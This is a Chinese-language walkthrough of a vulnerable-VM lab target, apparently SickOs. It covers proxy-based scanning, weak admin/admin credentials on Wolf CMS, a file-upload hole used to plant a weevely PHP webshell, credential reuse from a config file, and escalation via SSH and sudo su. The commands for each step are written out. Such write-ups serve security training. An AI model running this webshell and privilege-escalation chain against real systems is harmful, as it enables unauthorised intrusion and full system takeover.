靶機:192.168.12.130
kali: 192.168.249.128
一、資訊收集
nmap -sV 192.168.12.130 –掃描開放埠
3128埠是作為代理
dirsearch -u http://192.168.12.130 --proxy=192.168.12.130:3128 –掃下web目錄
掃到robots.txt
Wolf CMS
后臺管理:?/admin
一試就出來了–弱口令:admin/admin
Wolfcms 0.8.2中存在任意檔案上傳漏洞
weevely是適用于php網站的webshell工具,使用weevely生成的木馬免殺能力較強,而且使用加密連接,往往能輕松突破WAF攔截,(又學到一個工具)
weevely generate 666 yasso.php –密碼666
–上傳–
weevely連接木馬(需要開啟代理)
export http_proxy=http://192.168.12.130:3128 –配置代理
打完靶機切記洗掉代理!!!
unset http_proxy –洗掉代理
weevely http://192.168.12.130/wolfcms/public/yasso.php 666 –連接木馬
二、提權
cd /var/www/wolfcms–/var/www/wolfcms目錄下面發現資料庫組態檔
發現用戶名/密碼=root/john@123
貌似只允許本地連接
cat /etc/passwd | grep /bin/bash –查看當前用戶
發現sickos用戶
root資料庫密碼即sickos密碼
ssh sickos@192.168.12.130 ssh連接
sudo su –輸入sickos密碼
成功root
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/401558.html
標籤:其他
上一篇:第二屆BMZCTF網路安全公開賽